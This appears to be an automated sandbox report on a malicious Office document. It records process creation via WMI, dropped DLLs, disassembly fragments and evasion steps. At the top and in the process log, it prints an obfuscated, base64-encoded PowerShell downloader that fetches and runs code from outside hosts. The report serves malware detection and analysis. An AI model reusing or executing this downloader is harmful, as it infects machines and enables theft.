IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -w hidden -enc IAAgAFMAZQBUAC0ASQBUAEUATQAgACAAKAAnAHYAJwArACcAQQBSAGkAYQAnACsAJwBCAGwARQA6AGYAJwArACcANwBEACcAKwAnAEgAJwApACAAIAAoACAAWwBUAFkAUABlAF0AKAAiAHsAMgB9AHsAMAB9AHsANAB9AHsAMQB9AHsAMwB9ACIALQBGACAAJwBTAHQAZQBNAC4AaQBPACcALAAnAGMAdABvACcALAAnAHMAeQAnACwAJwByAHkAJwAsACcALgBkAGkAcgBlACcAKQApACAAIAA7ACAAcwBFAHQALQBJAHQARQBNACAAVgBhAFIAaQBBAEIATABlADoAUwBnADIAeABVACAAKAAgACAAWwBUAHkAUABlAF0AKAAiAHsANwB9AHsANAB9AHsANQB9AHsAMQB9AHsAOAB9AHsAMgB9AHsAMAB9AHsANgB9AHsAMwB9ACIALQBGACcAQQBuAEEAZwAnACwAJwBDAEUAUABvAEkAbgAnACwAJwBNACcALAAnAFIAJwAsACcAVABFAG0ALgBOAGUAdAAuAFMARQByACcALAAnAHYASQAnACwAJwBFACcALAAnAFMAWQBzACcALAAnAHQAJwApACAAIAApADsAIAAgACQAWgB6ADgAMgBfADQAMgA9ACQAQgAwADMASQAgACsAIABbAGMAaABhAHIAXQAoADMAMwApACAAKwAgACQASwA3ADgAUwA7ACQATwAwADAARwA9ACgAJwBFAF8AJwArACcANgBaACcAKQA7ACAAIAAkAEYANwBEAEgAOgA6ACIAYwByAEUAQQBgAFQARQBEAEkAYABSAGAAZQBjAFQATwBSAHkAIgAoACQASABPAE0ARQAgACsAIAAoACgAKAAnAGUAZwBUAEwAJwArACcAeABiACcAKwAnAGYAJwApACsAJwB5AHYAJwArACcAawAnACsAJwBlAGcAJwArACcAVAAnACsAJwBHAGMAJwArACgAJwBxAHQAJwArACcAcgBfAGYAJwApACsAKAAnAGUAZwAnACsAJwBUACcAKQApAC4AIgByAGUAUABMAGAAQQBDAEUAIgAoACgAWwBDAEgAQQBSAF0AMQAwADEAKwBbAEMASABBAFIAXQAxADAAMwArAFsAQwBIAEEAUgBdADgANAApACwAWwBzAHQAcgBpAG4AZwBdAFsAQwBIAEEAUgBdADkAMgApACkAKQA7ACQAUAA0ADYAVQA9ACgAJwBBACcAKwAoACcANgA1ACcAKwAnAFEAJwApACkAOwAgACAAJABTAEcAMgBYAFUAOgA6ACIAcwBgAEUAQwB1AGAAUgBpAFQAWQBwAHIATwBUAG8AYABjAGAATwBsACIAIAA9ACAAKAAnAFQAbAAnACsAKAAnAHMAMQAnACsAJwAyACcAKQApADsAJABJAF8ANwBSAD0AKAAnAEQAJwArACgAJwA3ADUAJwArACcARwAnACkAKQA7ACQAWQB6AGoAcQB4AHgAcQAgAD0AIAAoACcAQwA0ACcAKwAnADYAVAAnACkAOwAkAEwAXwBfAFMAPQAoACgAJwBQAF8AJwArACcAXwAnACkAKwAnAEQAJwApADsAJABVAGsAMQB0AHQAMQBfAD0AJABIAE8ATQBFACsAKAAoACcASAAnACsAKAAnAE8AeAAnACsAJwBMAHgAYgBmACcAKQArACcAeQAnACsAJwB2ACcAKwAoACcAawBIAE8AeAAnACsAJwBHAGMAcQAnACkAKwAnAHQAJwArACgAJwByAF8AZgAnACsAJwBIAE8AeAAnACkAKQAuACIAcgBFAHAAbABgAEEAYwBlACIAKAAoACcASABPACcAKwAnAHgAJwApACwAWwBzAHQAUgBJAE4AZwBdAFsAQwBIAGEAUgBdADkAMgApACkAKwAkAFkAegBqAHEAeAB4AHEAKwAnAC4AZAAnACAAKwAgACcAbABsACcAOwAkAFQANQA1AEwAPQAoACgAJwBZACcAKwAnADIAMQAnACkAKwAnAFEAJwApADsAJABKAGcANAAxAHMAYwB3AD0AJwBoACcAIAArACAAJwB0AHQAJwAgACsAIAAnAHAAJwA7ACQATgBpAG8AbwBpADIAcQA9ACgAKAAnAG4AJwArACcAcwAgAHcAdQAgACcAKQArACgAJwBkACcAKwAnAGIAIAAnACkAKwAoACcAbgBkACcAKwAnADoAJwApACsAKAAnAC8ALwAnACsAJwBuAGkAJwApACsAJwBnAGgAJwArACgAJwB0ACcAKwAnAGwAaQBmAGUAbQB1ACcAKwAnAG0AYgAnACkAKwAnAGEAJwArACgAJwBpAC4AJwArACcAYwBsACcAKQArACgAJwB1AGIALwB4ACcAKwAnAC8AMAB3ACcAKwAnAEIAJwApACsAKAAnAEQAMwAnACsAJwAvACEAbgAnACsAJwBzACAAdwAnACkAKwAnAHUAIAAnACsAJwBkACcAKwAnAGIAJwArACgAJwAgAG4AZAAnACsAJwBzACcAKQArACcAOgAvACcAKwAoACcALwAnACsAJwBzAGgAbwAnACkAKwAoACcAcAAuAG4AbwAnACsAJwB3ACcAKQArACcAZgAnACsAKAAnAGEAbAAuAGQAJwArACcAZQAnACkAKwAnAHYAJwArACcALwB3ACcAKwAoACcAcAAtAGkAbgAnACsAJwBjACcAKQArACgAJwBsAHUAJwArACcAZABlACcAKQArACgAJwBzAC8AUgAnACsAJwBsAE0ATwAnACsAJwBiAGYAJwApACsAKAAnADIAagAwACcAKwAnAC8AIQBuAHMAIAB3ACcAKwAnAHUAJwApACsAKAAnACAAJwArACcAZABiACAAJwArAC			Jump to behavior

Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0043100B push ss; iretd	7_2_0043100C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0018F090 push edx; ret	7_2_0018F237
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0017057F push ss; iretd	7_2_00170580
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00482D98 push 00482E25h; ret	7_2_00482E1D
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00490020 push 00490058h; ret	7_2_00490050
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00484038 push 00484064h; ret	7_2_0048405C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045A0B4 push 0045A0E0h; ret	7_2_0045A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045A0B2 push 0045A0E0h; ret	7_2_0045A0D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045B274 push 0045B2CDh; ret	7_2_0045B2C5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0046C34C push 0046C378h; ret	7_2_0046C370
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045E450 push ecx; mov dword ptr [esp], edx	7_2_0045E454
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004904F4 push 0049055Ch; ret	7_2_00490554
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00490498 push 004904EFh; ret	7_2_004904E7
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004905F0 push 0049063Ch; ret	7_2_00490634
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0048B588 push 0048B5CAh; ret	7_2_0048B5C2
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00490580 push 004905ACh; ret	7_2_004905A4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004905B8 push 004905E4h; ret	7_2_004905DC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00490654 push 00490680h; ret	7_2_00490678
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004906C4 push 004906F0h; ret	7_2_004906E8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045D6DC push 0045D751h; ret	7_2_0045D749
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045E6F0 push ecx; mov dword ptr [esp], edx	7_2_0045E6F4
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0049068C push 004906B8h; ret	7_2_004906B0
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045E696 push ecx; mov dword ptr [esp], edx	7_2_0045E69C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00458748 push 00458774h; ret	7_2_0045876C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045D754 push 0045D7ADh; ret	7_2_0045D7A5
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0045E750 push ecx; mov dword ptr [esp], edx	7_2_0045E754
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004907E4 push 00490827h; ret	7_2_0049081F
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00458798 push 004587C4h; ret	7_2_004587BC
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_004937A8 push 004937E0h; ret	7_2_004937D8
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_00493848 push 00493874h; ret	7_2_0049386C
Source: C:\Windows\SysWOW64\rundll32.exe	Code function: 7_2_0049086C push 00490898h; ret	7_2_00490890

Persistence and Installation Behavior:

Creates processes via WMI

Show sources

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

WMI Queries: IWbemServices::ExecMethod - Win32_Process::Create

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

File created: C:\Users\user\Lxbfyvk\Gcqtr_f\C46T.dll

Jump to dropped file

Source: C:\Windows\SysWOW64\rundll32.exe

PE file moved: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl

Jump to behavior

Hooking and other Techniques for Hiding and Protection:

Hides that the sample has been downloaded from the Internet (zone.identifier)

Show sources

Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Eahqlsuythns\jqbptpobcyu.bhl:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Xhprrouvvr\jernautsj.lga:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Lajmixobikmt\gjxhkbksotj.zja:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Txroij\ohrhi.kon:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Whtybzptnxj\kaptmaxkac.ztu:Zone.Identifier read attributes \| delete	Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Dzirlcatgln\dntukqrwhf.kiu:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Mxtcfbxykefck\ibcdoyenctts.gsv:Zone.Identifier read attributes \| delete
Source: C:\Windows\SysWOW64\rundll32.exe	File opened: C:\Windows\SysWOW64\Ynnlsbotf\dxdmxwxi.pod:Zone.Identifier read attributes \| delete

Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
